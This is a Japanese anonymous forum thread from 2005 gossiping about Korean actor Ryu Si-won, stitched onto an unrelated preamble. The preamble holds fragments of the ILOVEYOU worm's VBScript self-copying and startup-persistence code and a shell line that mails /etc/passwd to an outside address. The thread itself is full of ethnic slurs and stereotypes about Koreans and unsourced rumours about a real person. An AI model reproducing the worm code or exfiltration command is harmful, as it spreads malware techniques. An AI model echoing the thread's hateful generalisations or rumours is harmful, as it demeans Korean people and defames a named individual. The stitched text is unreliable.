c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

199 :魅せられた名無しさん:2005/06/09(木) 11:27:55
925 名前:奥さまは名無しさん[sage] 投稿日:2005/05/28(土) 23:29:14 ID:???
リュシォンファンってこのドラマどうよ?
ひたすらバカに見えてくるので、地上波で流されるとソンするのは
リュシォンじゃないの?

200 :魅せられた名無しさん:2005/06/09(木) 22:01:57
(´Д`)y━ーーー┛~~~ <>>200get!

201 :魅せられた名無しさん:2005/06/10(金) 02:01:08
ぼったくり韓国人リスト
ペ・ヨンジュン
ウォン・ビン
チャン・ドンゴン
パク・ヨンハ
パク・シニャン
パク・ソルミ
チェ・ジウ
グォン・サウン
リュ・シウォン
イ・フィヒャン
イ・ビョンホン
イ・ドンゴン
イ・ヨンエ
イ・ジャンヒャン
キム・テヒ
キム・ヒソン
キム・ジョンウン
シン・ミナ
シム・ウナ


202 :魅せられた名無しさん:2005/06/11(土) 21:59:02
さがりすぎ

203 :魅せられた名無しさん:2005/06/11(土) 22:03:41
あの…ヨンハヲタです。
ヨンハスレ荒らされてまして
シオンスレの住人にご迷惑を掛けてごめんなさい。
悲しいことに安置スレができたんです
▲▼干され俳優ヨ●ハスレ住人を監察するスレ▼▲
http://tv6.2ch.net/test/read.cgi/celebrity/1118482810/



204 :魅せられた名無しさん:2005/06/12(日) 13:55:53
さがりすぎ

205 :魅せられた名無さん:2005/06/12(日) 21:00:05
同じソンジェっつう役名だけど、
TBS「ヤクソク」のヤン・ジヌの方が100万倍かっこよくってよ!


206 :魅せられた名無しさん:2005/06/13(月) 00:56:34
リュシォンは日本と日本人大嫌いなんだって韓国で悪口いいまくってるんだって それを聞いてなんか冷めました

207 :魅せられた名無しさん:2005/06/13(月) 01:23:59
名前だけはかっこいいリュ・シウォン

>>206
ソースは?ソースないなら信用しない

208 :魅せられた名無しさん:2005/06/13(月) 03:40:54
>>207
ソースなくたって、これまでのインタビューでわかる。
日本人も韓国人見習えとか、平気で日本で言うし、
日本のラーメンは大抵の韓国人は嫌いですってはっきり言ってた。

209 :魅せられた名無しさん:2005/06/13(月) 03:52:24
>>207
ソース出せとか、あーたahoo?
日本人の金づるの前とインタビューでは良い顔しか
しないよ。韓国人は心底、日本人が嫌いです。

210 :魅せられた名無しさん:2005/06/13(月) 09:50:03
日本が嫌いかも知れないけれど、それを、口にするとは思わない。
シウォンが、韓国芸能人のなかで、一番、日本に、全力投球していると思う。
韓国での人気低下、シャンプー等の日本での販売拡張、マーネジメントも
したいと公言しているんだから。
彼は、ハッキリとものを言うタイプ(だから、叩かれるだけど)
日本の人気に嫉妬する連中の”デマ”でしょう。

211 :魅せられた名無しさん:2005/06/13(月) 10:58:58
やっぱりリュシォンはダメみたい なんかムカついてきた 好きだったのにな

212 :魅せられた名無しさん:2005/06/13(月) 12:37:28
これまでのインタヴュー、ふつうだったけどな。
とくに日本の悪口っぽいことも言ってなかったし。
昔は何かやったり言ったりした“そうだ”けどさ。
ネットでそういう話がでまわっているだけで、
本チャン見たことないから。
俺、べつにファンじゃないし、
どっちかっていうと、シンガーとしてはかんべんってほうだけど
(歌わないでくれ!)。



213 :魅せられた名無しさん:2005/06/13(月) 13:05:15
秋のコンチケいくら?
パク・ヨンハ@万円…‥

214 :魅せられた名無しさん:2005/06/13(月) 15:11:43
>208
逆じゃあない?
日本の町並みの清潔さに、煙草の吸殻をポイ捨てしてた自分を(母国で)
反省し、韓国も見習うべきだって言ってたよね。
韓国の議員さんの前でも、マネージメント等で、日本に学ぶ点は多く
一過性のブームにしないためにも、政府の協力が不可欠だと述べていたし
(韓国のテレビで報道してたし)捏造は、やめようよ。

215 :魅せられた名無しさん:2005/06/13(月) 15:13:41
韓国人は日本人のことも日本も大嫌いだよ
そのうち「日本は勧告の領土です」って言い出すよ

216 :889です:2005/06/13(月) 20:52:53
日本での活動について

「自分は韓国人なので韓国での仕事をメインにして逝きたい」

ってゆーなことをNHKのインタで(美しき日々BS初回放送当時)逝ってたよ。
あとなんらかの媒体でもそんなことゆってた。

それを当時聞いたとき、そう言わなければ韓国では生きてゆけないんだな・・・・
とおもた。
なんか韓国人というのをどの媒体でも強調して聞こえてきて(伝わってきて)
あの国には言論の自由がないんだな・・・・とおもったよ。


217 :魅せられた名無しさん:2005/06/13(月) 22:00:06
「韓国人を見習え」って韓タメで言ってたな。
どこを見習えってんだよ。

218 :奥さまは名無しさん:2005/06/13(月) 22:29:28
・パクリ精神なところ
・レイプ率世界No.1なところ
・すぐファビョルところ
・根にもつ精神なところ。
・容姿第一(整形推奨国)なところ

他にもなにかあったら続けてください。

>>217日本人が韓国に逝って「韓国人も日本人を見習うンダニ」
なーんて言ったら、大変なことになる。
シウォン調子に乗り過ぎ。
ほんと死んでホゥスィー


219 :魅せられた名無しさん:2005/06/13(月) 22:42:30
・捏造天国(かの国は新聞に堂々と捏造記事が載るわけで)

国旗を焼いてひき逃げするような輩に「見習え」と言われるのは心外だな。

220 :奥さまは名無しさん:2005/06/13(月) 23:24:35
日本人巡査役のイ・ジョンス、「日本は嫌いだが学ぶところも多い」 2005/06/10 16:08

http://japanese.yna.co.kr/service/article_view.asp?News_id=200506101220481

【ソウル10日聯合】MBCテレビで放送中のドラマ「環生−NEXT」に
日本の巡査役で出演するイ・ジョンスさんが、日本についての自身の考えを語った。
京畿道・富川の撮影現場でイさんは「率直に言って侵略を受けたという理由だけで日本のことは嫌い。
でも学ぶところは多い国だと思う。
なぜ日本が発展したのか知りたくて日本語を習おうと思った。
番組の撮影が終わったらまた日本へ行く計画だ」と話した。
 イさんは、前回出演していたドラマの撮影が終わった後、
語学研修のため日本に行っていたが、今回のドラマに出演するため帰国している。
「環生−NEXT」は、現在と過去を舞台に4人の男女の行き違う愛を描いたドラマ。
13〜14日の放映分では、ベルリン五輪のマラソンで孫基禎選手の優勝を伝える新聞写真から
日章旗を抹消した新聞記者と、その彼を偶然にかくまう看護士の話を描く。


221 :魅せられた名無しさん:2005/06/15(水) 01:20:53
新曲、楽しみ!!!
特に「僕の名前を呼び捨てにしなかった君」って曲
早く聞きたい。タイトルがイイ!!!

222 :魅せられた名無さん:2005/06/15(水) 14:05:36
肛門!肛門!肛門!呼び捨てにしたアテクシ。

223 :魅せられた名無しさん:2005/06/15(水) 16:24:36
シウォンはソウルの高級マンションにお住まい?

224 :魅せられた名無しさん:2005/06/15(水) 16:28:33
4音兄の葡萄缶行って見たいデツ。
一般発売日とチケット代教えてください。

225 :魅せられた名無しさん:2005/06/15(水) 18:47:50
>>218
「韓国が死んでも日本に追いつけない理由」を書いた
韓国在住の日本人、百瀬さんがいるじゃん。
韓国マスコミでひっぱりだこだった。

226 :魅せられた名無しさん:2005/06/17(金) 03:01:35
>>224
あんたも奇特な人だね。わざわざ音痴な歌声を高い
金出して観に行くなんてw 御金の無駄遣いややめま
しょう。

227 :魅せられた名無しさん:2005/06/17(金) 07:27:58
鶴橋公民館でコンサートやらないの?

228 :魅せられた名無しさん:2005/06/17(金) 09:41:19
>>227
もうちょっと落ちぶれてから...

229 :魅せられた名無しさん:2005/06/17(金) 20:20:34
シウォン=村上ショージ

230 :魅せられた名無しさん:2005/06/18(土) 15:37:13
似てないよ

231 :魅せられた名無しさん:2005/06/18(土) 23:53:05
なんで肛門なの・・

232 :魅せられた名無しさん:2005/06/19(日) 03:21:37
肛門みたいな顔だから。

233 :魅せられた名無しさん:2005/06/19(日) 22:49:57
そ、そうかあ・・?

234 :魅せられた名無しさん:2005/06/20(月) 15:23:27
肛門様に失礼です。

235 :魅せられた名無しさん:2005/06/22(水) 15:05:03

最近の韓国エンタメ関連のビジネスは、どうも商売優先の匂いがしてきます。
韓国の俳優のファン・ミーティングもけっこうな金額するらしいですし。
そりゃ、今は韓国関連のコンテンツは大きなビジネス・チャンスだと
いうことはわかるんですが。どうなの、このブーム?


236 :魅せられた名無しさん:2005/06/23(木) 13:30:28
やっと見つけたこのスレ

237 :魅せられた名無しさん:2005/06/24(金) 11:18:50
シウォンの追っかけ
ばばあども、韓国のレース場で
又、何かやらかしたの?
詳しく知りたいんだけど・・

238 :魅せられた名無しさん:2005/06/25(土) 19:02:18
シウォンがあれだけのコメント出すってことは・・・
ババアがマナー悪いんじゃないの?韓国まで行って嫌われてるなんて

239 :魅せられた名無しさん:2005/06/26(日) 00:10:16

おばはんたち、韓国のレース場にまでおしかけて
シウォンにうざがられてる(笑)

あたりまえだよ
自分に置き換えたら、趣味の世界にまで、ファン(しかもおばさんばっか)が来たら
ウザイ以外何ものでもない

だいたいそこまでしてどーしたいのか…
あって見染めてもらえるとでも思ってるのか?
結婚もして旦那や子供もいるくせにキモ過ぎ…

どんなことがあってもあんたとシウォンがどうかなるなんてありえないから
おばはん、恥ずかしい追っかけはやめてよね・・



240 :魅せられた名無しさん:2005/06/26(日) 00:13:29
前は終了後にニコニコサービスして喜んでたのに。
状況かわったのか?

241 :魅せられた名無しさん:2005/06/26(日) 00:52:48
ババアに愛想つかしたのよ

242 :魅せられた名無しさん:2005/06/26(日) 00:58:08
武道館のコンサートって先払いなんだ。
落ちたら返金て・・・普通当選してから払うもんでないの?
別に行かないからどっちでもいいけどさ。

243 :魅せられた名無しさん:2005/06/26(日) 02:52:36

スマップとかもそうだよ
先払い。
確かにヘンだよね
とりあえず金集めて何するんだか?投資でもするのか?

244 :魅せられた名無しさん:2005/06/26(日) 02:57:40

返金って、チケット代はもちろん600円も返してくれるよね?
それ返ってこなかったら、600円(チリも積もれば大きい)まるもうけじゃん?

245 :魅せられた名無しさん:2005/06/26(日) 04:21:21
矢沢のえいちゃん コンサートもそうだよ。先払い

246 :魅せられた名無しさん:2005/06/26(日) 05:19:20
B'zや他のアーティストも当選してから払込用紙が届くよ。
確実に当選するアーティスト以外は先払いは怪しすぎ。

須磨とかは先に集金して集まった莫大な御金を銀行に
預けて利子が凄いって聞いたけど肛門もそうなの?

>>244
普通は600円は返ってこないけど。返送手数料に取られるのでは。

247 :魅せられた名無しさん:2005/06/26(日) 08:16:38
242だがファンクラブの先払いって結構あるんだ。
ぴあとかイープラスでしか予約したことなかったから知らなんだ。

彼の場合もどうせ半分以上返金になるんだろうけど
ほんとに返金されるのか心配だw
返金の手間の方が面倒だと思うんだけど、やっぱり資金集め?

248 :魅せられた名無しさん:2005/06/26(日) 09:15:45
金も返さず豚鬘

249 :魅せられた名無しさん:2005/06/26(日) 16:39:21
シウォンのにーちゃんが、料金取ってレース見るツアーやってんだよ。

250 :☆みゅう様( -o-)、姦国ペッ☆ ◆MYU8XBoDOM :2005/06/26(日) 16:40:03
ゴミ

251 :魅せられた名無さん:2005/06/26(日) 20:15:13
ヲバたち何をやったのか、肛門が何て言ったのか
詳しく教えてください。

252 :魅せられた名無しさん:2005/06/26(日) 22:27:46
600円ってさぁ
コンサートチケットの配送や返金手数料とかでかかるお金を
当選してもいないのに、そんな手間賃なんで先に払わなきゃいけないの??

当選しなかったら600円も全額返してもらわないと、なんか騙された感じ
バカみたいじゃん!

電話で受付とか、電話の回線増やさないといけないしや、アルバイト雇わないといけないし
金かかるんだとうけどさぁ
そんなのケチってファンに先金出させちゃってるって、最悪

当選しなかったら、チケット代は当たり前だけど600円も返してもらわないと
納得いかない!

253 :魅せられた名無しさん:2005/06/26(日) 22:30:56

そもそもさぁ
韓国まで行っちゃうおバカさんなおばさんみたいに
まともな思考能力なくしちゃうくらい
シウォンにとち狂ってるわけじゃないし、

こう、納得がいかないチケットの発売の仕方してたら
行きたくもなくなってきた

そうとうバカにしてる 日本のファンを

254 :魅せられた名無しさん:2005/06/26(日) 22:33:24
日本人嫌いでも、口が裂けても言えないだろ、人気商売なんだから
実際嫌われてるみたいだけど、これでもかなり抑えてるって感じ。
ファンがおしよせたらレースクイーン好きなのに、ナンパもできないいんじゃない?
かなり遊んでるって、韓国では有名ならしいし・・
コメントも控えめで優等生的コメントだけど、裏ではボロくそ言ってそう。

255 :魅せられた名無しさん:2005/06/26(日) 22:55:07
あのチケット発売の仕方は、ジャニ系とか、とにかくファンに強気でないと普通やらないけどね

256 :魅せられた名無しさん:2005/06/27(月) 04:47:21
本当に強気な販売。ジャニ系、独自の発売方法だよね。
それを一時的な韓流ブームのタレに使うなんて・・・。
いい資金集め。唄も満足に唄えない肛門がビルボードに
入るアメリカの人気ロックバンドと同じ位、チケ代ボル
なんて日本人は舐められてる。ヲタ、いい加減に目を覚ませ!!

257 :魅せられた名無しさん:2005/06/27(月) 09:37:45
肛門は日本で大人しく振舞って印象よくしてても、
本国では嫌われ者の本性出しまくってるってわけだ。
それでもハエのように群がるヲバが哀れ。

258 :魅せられた名無しさん:2005/06/27(月) 09:54:57
シウォンさんもスタッフの方もとても優しいですよ。感激してます。
本国でそんな......なんですか。
マナーのない日本人ファンには驚いてます。

259 :魅せられた名無しさん:2005/06/27(月) 10:01:22
だから、何をやらかしたの??

260 :魅せられた名無しさん:2005/06/27(月) 10:15:13
自演乙

261 :魅せられた名無しさん:2005/06/27(月) 10:20:34
嫌韓はジャニ系が必死のスレでいいですか?

262 :魅せられた名無しさん:2005/06/27(月) 12:27:22
>>258
何でageるの?

263 :魅せられた名無しさん:2005/06/27(月) 16:56:33
>>261
シウォンとジャニ系を比べる方がむりが...

264 :魅せられた名無しさん:2005/06/27(月) 20:16:12
シウォン遊び人なの?うそ〜!

265 :魅せられた名無しさん:2005/06/28(火) 04:06:42
自国で人気ないからバカヲバが多い日本で稼ぎまくってます。
肛門って韓国では本性丸出しで日本ヲバは嫌われまくってる
なんて笑えるw

とにかく日本人は金づるでしかない。

266 :魅せられた名無しさん:2005/06/28(火) 04:26:46
http://japanese.chosun.com/site/data/html_dir/2005/04/06/20050406000030.html

267 :魅せられた名無しさん:2005/06/29(水) 11:41:30
ソジヨンとは別れたの?

268 :魅せられた名無さん:2005/06/30(木) 21:28:32
結局ヲバたち何をしたか、肛門が何を言ったか
わからずじまいか…。

269 :魅せられた名無しさん:2005/06/30(木) 22:07:49
シウォンの今の”うんざり”のコメント内容が抽象的でわからん

270 :魅せられた名無しさん:2005/07/01(金) 15:34:24
肛門様のスレはここですか


78 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)